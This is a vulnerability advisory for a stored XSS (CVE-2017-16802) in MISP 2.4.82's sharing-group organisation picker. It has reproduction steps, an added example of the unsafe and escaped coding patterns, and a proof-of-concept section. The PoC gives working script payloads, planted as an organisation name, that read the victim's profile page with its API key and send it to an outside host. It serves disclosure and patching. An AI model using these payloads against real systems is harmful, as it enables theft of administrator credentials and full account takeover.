VULNERABILITY

XSS in the sharingGroupPopulateOrganisations function

DATE

13.11.2017 

Affected Vendor

CIRCL – Computer Incident Response Center Luxembourg

Affected Product

MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/

Vulnerable version

2.4.82

Fixed version

2.4.83

Recommendations

Update to MISP version 2.4.83 

Vulnerability details

There is an XSS in the 'Edit Sharing Group' area of MISP.

The easiest way to reproduce it:

  1. Create new organization with the following name: <script>alert('XSS');</script>
  2. Go to /Global Actions > List Sharing Groups/
  3. Edit an existing sharing group or add a new one
  4. Go to Organisations tab
  5. Add Local Organisation
  6. Select <script>alert('XSS');</script> and move to right by >>
  7. Click Add

It can be done the same way from Add Remote Organisation.
One possible scenario is that an organisation we trust synchronizes with ours and we want to add it to some sharing group.
This means that the attack requires admin interaction, but the attacker can gain full admin access to the victim's MISP by stealing the API key.
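The root cause is an organisation name that reaches the page as markup instead of text. The following is an added illustration, not MISP's own code: a picker populated from organisation names in the unescaped style that produces this class of bug, next to an escaped version. Function names, the record shape and the sample data are assumptions.

```javascript
// Added example, not code from MISP. Function names and the
// { id, name } record shape are assumptions for illustration.

// Constructed sample data: one benign organisation and one whose
// name carries markup, as in the advisory's reproduction steps.
const sampleOrganisations = [
  { id: 1, name: "CIRCL" },
  { id: 2, name: "<script>alert('XSS');</script>" },
];

// Vulnerable pattern: the name is concatenated straight into HTML,
// so a name containing markup becomes part of the document.
function populateOrganisationsUnsafe(orgs) {
  return orgs
    .map((o) => '<option value="' + o.id + '">' + o.name + "</option>")
    .join("");
}

// Escape the characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: every field influenced by another party is escaped
// for the context it lands in, so the name is displayed literally.
function populateOrganisationsSafe(orgs) {
  return orgs
    .map((o) => '<option value="' + escapeHtml(o.id) + '">' + escapeHtml(o.name) + "</option>")
    .join("");
}

// Reviewer/test check: does a raw <script> tag survive into the output?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}
```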

PoC

Stealing the API key from /users/view/me.
A fake organisation name is prepended so that the victim sees it rather than the actual payload.
Replace https://misp2.local with a webserver you control and check its logs after trying.

Follow the above steps to reproduce and put the following as an organisation name:
PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){s=d.indexOf('<h2>User</h2>');e=d.indexOf('<div class="actions debugOff sideMenu',s);if(s>e)e=s*99;i=d.substring(s,e);$.get('https://misp2.local/'+escape(i));});</script>

Clear version:

PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){
  pos_start = d.indexOf('<h2>User</h2>');
  pos_end = d.indexOf('<div class="actions debugOff sideMenu">', pos_start);
  if(pos_start > pos_end) pos_end = pos_start*99;
  interested = d.substring(pos_start, pos_end);
  $.get('https://misp2.local/'+escape(interested));
});</script>

PoC

Short version:

PUBLIC-NORTH-ATLANTIC-ORGANIZATION<script>$.get('/users/view/me',function(d){$.get('https://misp2.local/'+escape(d));});</script>

CVE

CVE-2017-16802

Credits

Dawid Czarnecki